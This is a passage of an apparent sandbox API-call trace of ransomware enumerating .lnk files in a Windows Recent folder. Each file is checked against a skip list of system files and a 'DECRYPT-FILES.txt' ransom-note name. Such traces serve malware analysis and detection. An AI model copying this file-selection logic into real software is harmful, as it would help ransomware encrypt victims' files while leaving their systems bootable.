[0080.312] lstrcmpiW (lpString1="eD8jo.flv.lnk", lpString2="bootsect.bak") returned 1 [0080.312] lstrcmpiW (lpString1="eD8jo.flv.lnk", lpString2="ntuser.dat.log") returned -1 [0080.312] lstrcmpiW (lpString1="eD8jo.flv.lnk", lpString2="thumbs.db") returned -1 [0080.312] lstrcmpiW (lpString1="eD8jo.flv.lnk", lpString2="Bootfont.bin") returned 1 [0080.312] lstrlenW (lpString="eD8jo.flv.lnk") returned 13 [0080.312] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0080.312] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ad799b0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0x8ad799b0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x8ad799b0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xf7f, dwReserved0=0x0, dwReserved1=0x0, cFileName="FAus_oITOLQc.lnk", cAlternateFileName="FAUS_O~1.LNK")) returned 1 [0080.312] lstrcmpiW (lpString1="FAus_oITOLQc.lnk", lpString2="DECRYPT-FILES.txt") returned 1 [0080.312] lstrcmpiW (lpString1="FAus_oITOLQc.lnk", lpString2="autorun.inf") returned 1 [0080.312] lstrcmpiW (lpString1="FAus_oITOLQc.lnk", lpString2="boot.ini") returned 1 [0080.312] lstrcmpiW (lpString1="FAus_oITOLQc.lnk", lpString2="desktop.ini") returned 1 [0080.312] lstrcmpiW (lpString1="FAus_oITOLQc.lnk", lpString2="ntuser.dat") returned -1 [0080.312] lstrcmpiW (lpString1="FAus_oITOLQc.lnk", lpString2="iconcache.db") returned -1 [0080.312] lstrcmpiW (lpString1="FAus_oITOLQc.lnk", lpString2="bootsect.bak") returned 1 [0080.313] lstrcmpiW (lpString1="FAus_oITOLQc.lnk", lpString2="ntuser.dat.log") returned -1 [0080.313] lstrcmpiW (lpString1="FAus_oITOLQc.lnk", lpString2="thumbs.db") returned -1 [0080.313] lstrcmpiW (lpString1="FAus_oITOLQc.lnk", lpString2="Bootfont.bin") returned 1 [0080.313] lstrlenW (lpString="FAus_oITOLQc.lnk") returned 16 [0080.313] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0080.313] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ac48eb0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0x8ac48eb0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x8ac48eb0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xe9f, dwReserved0=0x0, dwReserved1=0x0, cFileName="FcUVZVQezWKj.lnk", cAlternateFileName="FCUVZV~1.LNK")) returned 1 [0080.313] lstrcmpiW (lpString1="FcUVZVQezWKj.lnk", lpString2="DECRYPT-FILES.txt") returned 1 [0080.313] lstrcmpiW (lpString1="FcUVZVQezWKj.lnk", lpString2="autorun.inf") returned 1 [0080.313] lstrcmpiW (lpString1="FcUVZVQezWKj.lnk", lpString2="boot.ini") returned 1 [0080.313] lstrcmpiW (lpString1="FcUVZVQezWKj.lnk", lpString2="desktop.ini") returned 1 [0080.313] lstrcmpiW (lpString1="FcUVZVQezWKj.lnk", lpString2="ntuser.dat") returned -1 [0080.313] lstrcmpiW (lpString1="FcUVZVQezWKj.lnk", lpString2="iconcache.db") returned -1 [0080.313] lstrcmpiW (lpString1="FcUVZVQezWKj.lnk", lpString2="bootsect.bak") returned 1 [0080.313] lstrcmpiW (lpString1="FcUVZVQezWKj.lnk", lpString2="ntuser.dat.log") returned -1 [0080.313] lstrcmpiW (lpString1="FcUVZVQezWKj.lnk", lpString2="thumbs.db") returned -1 [0080.313] lstrcmpiW (lpString1="FcUVZVQezWKj.lnk", lpString2="Bootfont.bin") returned 1 [0080.313] lstrlenW (lpString="FcUVZVQezWKj.lnk") returned 16 [0080.313] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0080.313] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a3f41b0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0x8a3f41b0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x8a3f41b0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x232, dwReserved0=0x0, dwReserved1=0x0, cFileName="fSI8D5g.lnk", cAlternateFileName="")) returned 1 [0080.313] lstrcmpiW (lpString1="fSI8D5g.lnk", lpString2="DECRYPT-FILES.txt") returned 1 [0080.313] lstrcmpiW (lpString1="fSI8D5g.lnk", lpString2="autorun.inf") returned 1 [0080.313] lstrcmpiW (lpString1="fSI8D5g.lnk", lpString2="boot.ini") returned 1 [0080.313] lstrcmpiW (lpString1="fSI8D5g.lnk", lpString2="desktop.ini") returned 1 [0080.313] lstrcmpiW (lpString1="fSI8D5g.lnk", lpString2="ntuser.dat") returned -1 [0080.313] lstrcmpiW (lpString1="fSI8D5g.lnk", lpString2="iconcache.db") returned -1 [0080.313] lstrcmpiW (lpString1="fSI8D5g.lnk", lpString2="bootsect.bak") returned 1 [0080.313] lstrcmpiW (lpString1="fSI8D5g.lnk", lpString2="ntuser.dat.log") returned -1 [0080.313] lstrcmpiW (lpString1="fSI8D5g.lnk", lpString2="thumbs.db") returned -1 [0080.313] lstrcmpiW (lpString1="fSI8D5g.lnk", lpString2="Bootfont.bin") returned 1 [0080.313] lstrlenW (lpString="fSI8D5g.lnk") returned 11 [0080.313] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0080.313] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8923fe10, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0x8aa7fe30, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x8aa7fe30, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x1da, dwReserved0=0x0, dwReserved1=0x0, cFileName="ggFLb 9Aa.lnk", cAlternateFileName="GGFLB9~1.LNK")) returned 1 [0080.313] lstrcmpiW (lpString1="ggFLb 9Aa.lnk", lpString2="DECRYPT-FILES.txt") returned 1 [0080.313] lstrcmpiW (lpString1="ggFLb 9Aa.lnk", lpString2="autorun.inf") returned 1 [0080.313] lstrcmpiW (lpString1="ggFLb 9Aa.lnk", lpString2="boot.ini") returned 1 [0080.313] lstrcmpiW (lpString1="ggFLb 9Aa.lnk", lpString2="desktop.ini") returned 1 [0080.313] lstrcmpiW (lpString1="ggFLb 9Aa.lnk", lpString2="ntuser.dat") returned -1 [0080.314] lstrcmpiW (lpString1="ggFLb 9Aa.lnk", lpString2="iconcache.db") returned -1 [0080.314] lstrcmpiW (lpString1="ggFLb 9Aa.lnk", lpString2="bootsect.bak") returned 1 [0080.314] lstrcmpiW (lpString1="ggFLb 9Aa.lnk", lpString2="ntuser.dat.log") returned -1 [0080.314] lstrcmpiW (lpString1="ggFLb 9Aa.lnk", lpString2="thumbs.db") returned -1 [0080.314] lstrcmpiW (lpString1="ggFLb 9Aa.lnk", lpString2="Bootfont.bin") returned 1 [0080.314] lstrlenW (lpString="ggFLb 9Aa.lnk") returned 13 [0080.314] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0080.314] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a81e830, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0x8a81e830, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x8a81e830, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xe43, dwReserved0=0x0, dwReserved1=0x0, cFileName="gGxu.lnk", cAlternateFileName="")) returned 1 [0080.314] lstrcmpiW (lpString1="gGxu.lnk", lpString2="DECRYPT-FILES.txt") returned 1 [0080.314] lstrcmpiW (lpString1="gGxu.lnk", lpString2="autorun.inf") returned 1 [0080.314] lstrcmpiW (lpString1="gGxu.lnk", lpString2="boot.ini") returned 1 [0080.314] lstrcmpiW (lpString1="gGxu.lnk", lpString2="desktop.ini") returned 1 [0080.314] lstrcmpiW (lpString1="gGxu.lnk", lpString2="ntuser.dat") returned -1 [0080.314] lstrcmpiW (lpString1="gGxu.lnk", lpString2="iconcache.db") returned -1 [0080.314] lstrcmpiW (lpString1="gGxu.lnk", lpString2="bootsect.bak") returned 1 [0080.314] lstrcmpiW (lpString1="gGxu.lnk", lpString2="ntuser.dat.log") returned -1 [0080.314] lstrcmpiW (lpString1="gGxu.lnk", lpString2="thumbs.db") returned -1 [0080.314] lstrcmpiW (lpString1="gGxu.lnk", lpString2="Bootfont.bin") returned 1 [0080.314] lstrlenW (lpString="gGxu.lnk") returned 8 [0080.314] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0080.314] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ace1430, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0x8ace1430, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x8ace1430, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xfb8, dwReserved0=0x0, dwReserved1=0x0, cFileName="gtXCw8YOfxeWSlrp.lnk", cAlternateFileName="GTXCW8~1.LNK")) returned 1 [0080.314] lstrcmpiW (lpString1="gtXCw8YOfxeWSlrp.lnk", lpString2="DECRYPT-FILES.txt") returned 1 [0080.314] lstrcmpiW (lpString1="gtXCw8YOfxeWSlrp.lnk", lpString2="autorun.inf") returned 1 [0080.314] lstrcmpiW (lpString1="gtXCw8YOfxeWSlrp.lnk", lpString2="boot.ini") returned 1 [0080.314] lstrcmpiW (lpString1="gtXCw8YOfxeWSlrp.lnk", lpString2="desktop.ini") returned 1 [0080.314] lstrcmpiW (lpString1="gtXCw8YOfxeWSlrp.lnk", lpString2="ntuser.dat") returned -1 [0080.314] lstrcmpiW (lpString1="gtXCw8YOfxeWSlrp.lnk", lpString2="iconcache.db") returned -1 [0080.314] lstrcmpiW (lpString1="gtXCw8YOfxeWSlrp.lnk", lpString2="bootsect.bak") returned 1 [0080.314] lstrcmpiW (lpString1="gtXCw8YOfxeWSlrp.lnk", lpString2="ntuser.dat.log") returned -1 [0080.314] lstrcmpiW (lpString1="gtXCw8YOfxeWSlrp.lnk", lpString2="thumbs.db") returned -1 [0080.314] lstrcmpiW (lpString1="gtXCw8YOfxeWSlrp.lnk", lpString2="Bootfont.bin") returned 1 [0080.314] lstrlenW (lpString="gtXCw8YOfxeWSlrp.lnk") returned 20 [0080.314] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0080.314] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x89076d90, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0x89a226f0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x89a226f0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x273, dwReserved0=0x0, dwReserved1=0x0, cFileName="H1MiMyXALwnG6yS6.lnk", cAlternateFileName="H1MIMY~1.LNK")) returned 1 [0080.314] lstrcmpiW (lpString1="H1MiMyXALwnG6yS6.lnk", lpString2="DECRYPT-FILES.txt") returned 1 [0080.314] lstrcmpiW (lpString1="H1MiMyXALwnG6yS6.lnk", lpString2="autorun.inf") returned 1 [0080.314] lstrcmpiW (lpString1="H1MiMyXALwnG6yS6.lnk", lpString2="boot.ini") returned 1 [0080.315] lstrcmpiW (lpString1="H1MiMyXALwnG6yS6.lnk", lpString2="desktop.ini") returned 1 [0080.315] lstrcmpiW (lpString1="H1MiMyXALwnG6yS6.lnk", lpString2="ntuser.dat") returned -1 [0080.315] lstrcmpiW (lpString1="H1MiMyXALwnG6yS6.lnk", lpString2="iconcache.db") returned -1 [0080.315] lstrcmpiW (lpString1="H1MiMyXALwnG6yS6.lnk", lpString2="bootsect.bak") returned 1 [0080.315] lstrcmpiW (lpString1="H1MiMyXALwnG6yS6.lnk", lpString2="ntuser.dat.log") returned -1 [0080.315] lstrcmpiW (lpString1="H1MiMyXALwnG6yS6.lnk", lpString2="thumbs.db") returned -1 [0080.315] lstrcmpiW (lpString1="H1MiMyXALwnG6yS6.lnk", lpString2="Bootfont.bin") returned 1 [0080.315] lstrlenW (lpString="H1MiMyXALwnG6yS6.lnk") returned 20 [0080.315] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0080.315] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x89859670, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0x8b131c10, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x8b131c10, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xdb4, dwReserved0=0x0, dwReserved1=0x0, cFileName="h371.lnk", cAlternateFileName="")) returned 1 [0080.315] lstrcmpiW (lpString1="h371.lnk", lpString2="DECRYPT-FILES.txt") returned 1 [0080.315] lstrcmpiW (lpString1="h371.lnk", lpString2="autorun.inf") returned 1 [0080.315] lstrcmpiW (lpString1="h371.lnk", lpString2="boot.ini") returned 1 [0080.315] lstrcmpiW (lpString1="h371.lnk", lpString2="desktop.ini") returned 1 [0080.315] lstrcmpiW (lpString1="h371.lnk", lpString2="ntuser.dat") returned -1 [0080.315] lstrcmpiW (lpString1="h371.lnk", lpString2="iconcache.db") returned -1 [0080.315] lstrcmpiW (lpString1="h371.lnk", lpString2="bootsect.bak") returned 1 [0080.315] lstrcmpiW (lpString1="h371.lnk", lpString2="ntuser.dat.log") returned -1 [0080.315] lstrcmpiW (lpString1="h371.lnk", lpString2="thumbs.db") returned -1 [0080.315] lstrcmpiW (lpString1="h371.lnk", lpString2="Bootfont.bin") returned 1 [0080.315] lstrlenW (lpString="h371.lnk") returned 8 [0080.315] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0080.315] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8adc5c70, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0x8adc5c70, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x8adc5c70, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xa2c, dwReserved0=0x0, dwReserved1=0x0, cFileName="HJy9XqkxO.lnk", cAlternateFileName="HJY9XQ~1.LNK")) returned 1 [0080.315] lstrcmpiW (lpString1="HJy9XqkxO.lnk", lpString2="DECRYPT-FILES.txt") returned 1 [0080.315] lstrcmpiW (lpString1="HJy9XqkxO.lnk", lpString2="autorun.inf") returned 1 [0080.315] lstrcmpiW (lpString1="HJy9XqkxO.lnk", lpString2="boot.ini") returned 1 [0080.315] lstrcmpiW (lpString1="HJy9XqkxO.lnk", lpString2="desktop.ini") returned 1 [0080.315] lstrcmpiW (lpString1="HJy9XqkxO.lnk", lpString2="ntuser.dat") returned -1 [0080.315] lstrcmpiW (lpString1="HJy9XqkxO.lnk", lpString2="iconcache.db") returned -1 [0080.315] lstrcmpiW (lpString1="HJy9XqkxO.lnk", lpString2="bootsect.bak") returned 1 [0080.315] lstrcmpiW (lpString1="HJy9XqkxO.lnk", lpString2="ntuser.dat.log") returned -1 [0080.315] lstrcmpiW (lpString1="HJy9XqkxO.lnk", lpString2="thumbs.db") returned -1 [0080.315] lstrcmpiW (lpString1="HJy9XqkxO.lnk", lpString2="Bootfont.bin") returned 1 [0080.315] lstrlenW (lpString="HJy9XqkxO.lnk") returned 13 [0080.315] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0080.315] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x89f0b450, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0x89f0b450, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x89f0b450, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xa1a, dwReserved0=0x0, dwReserved1=0x0, cFileName="hpZUuiDNUpxuJrBS.flv.lnk", cAlternateFileName="HPZUUI~1.LNK")) returned 1 [0080.315] lstrcmpiW (lpString1="hpZUuiDNUpxuJrBS.flv.lnk", lpString2="DECRYPT-FILES.txt") returned 1 [0080.315] lstrcmpiW (lpString1="hpZUuiDNUpxuJrBS.flv.lnk", lpString2="autorun.inf") returned 1 [0080.316] lstrcmpiW (lpString1="hpZUuiDNUpxuJrBS.flv.lnk", lpString2="boot.ini") returned 1 [0080.316] lstrcmpiW (lpString1="hpZUuiDNUpxuJrBS.flv.lnk", lpString2="desktop.ini") returned 1 [0080.316] lstrcmpiW (lpString1="hpZUuiDNUpxuJrBS.flv.lnk", lpString2="ntuser.dat") returned -1 [0080.316] lstrcmpiW (lpString1="hpZUuiDNUpxuJrBS.flv.lnk", lpString2="iconcache.db") returned -1 [0080.316] lstrcmpiW (lpString1="hpZUuiDNUpxuJrBS.flv.lnk", lpString2="bootsect.bak") returned 1 [0080.316] lstrcmpiW (lpString1="hpZUuiDNUpxuJrBS.flv.lnk", lpString2="ntuser.dat.log") returned -1 [0080.316] lstrcmpiW (lpString1="hpZUuiDNUpxuJrBS.flv.lnk", lpString2="thumbs.db") returned -1 [0080.316] lstrcmpiW (lpString1="hpZUuiDNUpxuJrBS.flv.lnk", lpString2="Bootfont.bin") returned 1 [0080.316] lstrlenW (lpString="hpZUuiDNUpxuJrBS.flv.lnk") returned 24 [0080.316] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0080.316] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x89b531f0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0x8ae11f30, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x8ae11f30, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x1452, dwReserved0=0x0, dwReserved1=0x0, cFileName="hvIpcfVk.lnk", cAlternateFileName="")) returned 1 [0080.316] lstrcmpiW (lpString1="hvIpcfVk.lnk", lpString2="DECRYPT-FILES.txt") returned 1 [0080.316] lstrcmpiW (lpString1="hvIpcfVk.lnk", lpString2="autorun.inf") returned 1 [0080.316] lstrcmpiW (lpString1="hvIpcfVk.lnk", lpString2="boot.ini") returned 1 [0080.316] lstrcmpiW (lpString1="hvIpcfVk.lnk", lpString2="desktop.ini") returned 1 [0080.316] lstrcmpiW (lpString1="hvIpcfVk.lnk", lpString2="ntuser.dat") returned -1 [0080.316] lstrcmpiW (lpString1="hvIpcfVk.lnk", lpString2="iconcache.db") returned -1 [0080.316] lstrcmpiW (lpString1="hvIpcfVk.lnk", lpString2="bootsect.bak") returned 1 [0080.316] lstrcmpiW (lpString1="hvIpcfVk.lnk", lpString2="ntuser.dat.log") returned -1 [0080.316] lstrcmpiW (lpString1="hvIpcfVk.lnk", lpString2="thumbs.db") returned -1 [0080.316] lstrcmpiW (lpString1="hvIpcfVk.lnk", lpString2="Bootfont.bin") returned 1 [0080.316] lstrlenW (lpString="hvIpcfVk.lnk") returned 12 [0080.316] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0080.316] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8aed0610, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0x8aed0610, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x8aed0610, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xa58, dwReserved0=0x0, dwReserved1=0x0, cFileName="hxLbKT0VjkKfD.lnk", cAlternateFileName="HXLBKT~1.LNK")) returned 1 [0080.316] lstrcmpiW (lpString1="hxLbKT0VjkKfD.lnk", lpString2="DECRYPT-FILES.txt") returned 1 [0080.316] lstrcmpiW (lpString1="hxLbKT0VjkKfD.lnk", lpString2="autorun.inf") returned 1 [0080.316] lstrcmpiW (lpString1="hxLbKT0VjkKfD.lnk", lpString2="boot.ini") returned 1 [0080.316] lstrcmpiW (lpString1="hxLbKT0VjkKfD.lnk", lpString2="desktop.ini") returned 1 [0080.316] lstrcmpiW (lpString1="hxLbKT0VjkKfD.lnk", lpString2="ntuser.dat") returned -1 [0080.316] lstrcmpiW (lpString1="hxLbKT0VjkKfD.lnk", lpString2="iconcache.db") returned -1 [0080.316] lstrcmpiW (lpString1="hxLbKT0VjkKfD.lnk", lpString2="bootsect.bak") returned 1 [0080.316] lstrcmpiW (lpString1="hxLbKT0VjkKfD.lnk", lpString2="ntuser.dat.log") returned -1 [0080.316] lstrcmpiW (lpString1="hxLbKT0VjkKfD.lnk", lpString2="thumbs.db") returned -1 [0080.316] lstrcmpiW (lpString1="hxLbKT0VjkKfD.lnk", lpString2="Bootfont.bin") returned 1 [0080.316] lstrlenW (lpString="hxLbKT0VjkKfD.lnk") returned 17 [0080.316] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0080.316] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8aa7fe30, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0x8aa7fe30, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x8aa7fe30, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xf46, dwReserved0=0x0, dwReserved1=0x0, cFileName="i2GfW.lnk", cAlternateFileName="")) returned 1 [0080.317] lstrcmpiW (lpString1="i2GfW.lnk", lpString2="DECRYPT-FILES.txt") returned 1 [0080.317] lstrcmpiW (lpString1="i2GfW.lnk", lpString2="autorun.inf") returned 1 [0080.317] lstrcmpiW (lpString1="i2GfW.lnk", lpString2="boot.ini") returned 1 [0080.317] lstrcmpiW (lpString1="i2GfW.lnk", lpString2="desktop.ini") returned 1 [0080.317] lstrcmpiW (lpString1="i2GfW.lnk", lpString2="ntuser.dat") returned -1 [0080.317] lstrcmpiW (lpString1="i2GfW.lnk", lpString2="iconcache.db") returned -1 [0080.317] lstrcmpiW (lpString1="i2GfW.lnk", lpString2="bootsect.bak") returned 1 [0080.317] lstrcmpiW (lpString1="i2GfW.lnk", lpString2="ntuser.dat.log") returned -1 [0080.317] lstrcmpiW (lpString1="i2GfW.lnk", lpString2="thumbs.db") returned -1 [0080.317] lstrcmpiW (lpString1="i2GfW.lnk", lpString2="Bootfont.bin") returned 1 [0080.317] lstrlenW (lpString="i2GfW.lnk") returned 9 [0080.317] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0080.317] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a7d2570, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0x8b099690, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x8b099690, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xf07, dwReserved0=0x0, dwReserved1=0x0, cFileName="i4ouEKS0Y1j5q3bJi.lnk", cAlternateFileName="I4OUEK~1.LNK")) returned 1 [0080.317] lstrcmpiW (lpString1="i4ouEKS0Y1j5q3bJi.lnk", lpString2="DECRYPT-FILES.txt") returned 1 [0080.317] lstrcmpiW (lpString1="i4ouEKS0Y1j5q3bJi.lnk", lpString2="autorun.inf") returned 1 [0080.317] lstrcmpiW (lpString1="i4ouEKS0Y1j5q3bJi.lnk", lpString2="boot.ini") returned 1 [0080.317] lstrcmpiW (lpString1="i4ouEKS0Y1j5q3bJi.lnk", lpString2="desktop.ini") returned 1 [0080.317] lstrcmpiW (lpString1="i4ouEKS0Y1j5q3bJi.lnk", lpString2="ntuser.dat") returned -1 [0080.317] lstrcmpiW (lpString1="i4ouEKS0Y1j5q3bJi.lnk", lpString2="iconcache.db") returned -1 [0080.317] lstrcmpiW (lpString1="i4ouEKS0Y1j5q3bJi.lnk", lpString2="bootsect.bak") returned 1 [0080.317] lstrcmpiW (lpString1="i4ouEKS0Y1j5q3bJi.lnk", lpString2="ntuser.dat.log") returned -1 [0080.317] lstrcmpiW (lpString1="i4ouEKS0Y1j5q3bJi.lnk", lpString2="thumbs.db") returned -1 [0080.317] lstrcmpiW (lpString1="i4ouEKS0Y1j5q3bJi.lnk", lpString2="Bootfont.bin") returned 1 [0080.317] lstrlenW (lpString="i4ouEKS0Y1j5q3bJi.lnk") returned 21 [0080.317] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0080.317] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8993deb0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0x8993deb0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x8993deb0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xf37, dwReserved0=0x0, dwReserved1=0x0, cFileName="ii_H.lnk", cAlternateFileName="")) returned 1 [0080.317] lstrcmpiW (lpString1="ii_H.lnk", lpString2="DECRYPT-FILES.txt") returned 1 [0080.317] lstrcmpiW (lpString1="ii_H.lnk", lpString2="autorun.inf") returned 1 [0080.317] lstrcmpiW (lpString1="ii_H.lnk", lpString2="boot.ini") returned 1 [0080.317] lstrcmpiW (lpString1="ii_H.lnk", lpString2="desktop.ini") returned 1 [0080.317] lstrcmpiW (lpString1="ii_H.lnk", lpString2="ntuser.dat") returned -1 [0080.317] lstrcmpiW (lpString1="ii_H.lnk", lpString2="iconcache.db") returned 1 [0080.317] lstrcmpiW (lpString1="ii_H.lnk", lpString2="bootsect.bak") returned 1 [0080.317] lstrcmpiW (lpString1="ii_H.lnk", lpString2="ntuser.dat.log") returned -1 [0080.317] lstrcmpiW (lpString1="ii_H.lnk", lpString2="thumbs.db") returned -1 [0080.317] lstrcmpiW (lpString1="ii_H.lnk", lpString2="Bootfont.bin") returned 1 [0080.317] lstrlenW (lpString="ii_H.lnk") returned 8 [0080.317] lstrcmpiW (lpString1="lnk", lpString2="lnk") returned 0 [0080.318] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a6a1a70, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0x8a6a1a70, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x8a6a1a70, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x9f1, dwReserved0=0x0, dwReserved1=0x0, cFileName="iKm6.lnk", cAlternateFileName="")) returned 1 [0080.318] lstrcmpiW (lpString1="iKm6.lnk", lpString2="DECRYPT-FILES.txt") returned 1 [0080.318] lstrcmpiW (lpString1="iKm6.lnk", lpString2="autorun.inf") returned 1 [0080.318] lstrcpyW (in: lpString1=0x3f2df30, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\") returned="C:\\Users\\5p5NrGJn0jS 